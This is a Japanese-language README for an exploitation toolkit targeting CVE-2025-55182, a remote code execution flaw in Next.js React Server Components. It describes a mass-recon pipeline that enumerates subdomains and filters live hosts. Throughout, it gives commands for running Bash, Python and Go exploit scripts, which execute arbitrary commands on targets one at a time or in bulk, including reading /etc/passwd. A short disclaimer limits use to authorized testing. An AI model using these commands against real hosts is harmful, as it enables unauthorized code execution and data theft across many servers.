
Next.js RSC に影響する CVE-2025-55182 向けの高精度 RCE スキャナ。大規模スキャン、コマンド実行、自動化された偵察(recon)パイプラインをサポート。ペネトレーションテスター、研究者、バウンティハンター向けに設計されています。
React Server Components を使用する Next.js アプリケーションにおける重大なリモートコード実行 (RCE) の脆弱性 CVE-2025-55182 を検出および悪用するための包括的なツールキットです。
このリポジトリには、統合 Bash スキャナー (単一 & 大量モード)、Python/Go 実装、およびバグバウンティ偵察ワークフローが含まれています。

ワイルドカードドメインでの大量ハンティングには、スキャン前にターゲットを絞り込むためにこのパイプラインを使用します:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
scanner.sh スクリプトは単一ターゲットスキャンと、ファイルリストからの大量スキャンをサポートしています。
chmod +x scanner.sh
詳細な出力で特定のターゲットを検証するのに最適です。
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
URL のリストを効率的にスキャンし、脆弱なホストをファイルに保存します。
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Bash での特殊文字のエスケープに問題がある場合は、こちらを使用してください。
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
高性能かつ最小限の依存関係です。
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
このツールは教育目的および許可されたセキュリティテスト専用です。 無断使用は固く禁じられており、違法です。 開発者は、このプログラムの誤用またはそれによって引き起こされた損害について一切責任を負いません。
NVD CVE 詳細: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React セキュリティアドバイザリ (React Server Components の脆弱性): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery Nuclei テンプレート: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| フラグ | 説明 |
|---|
-d, --domain | 単一ターゲットの URL |
-l, --list | URL のリストを含むファイル |
-c, --command | 実行するコマンド (デフォルト: id) |
-o, --output | 脆弱なホストの出力ファイル (デフォルト: vulnerable_hosts.txt) |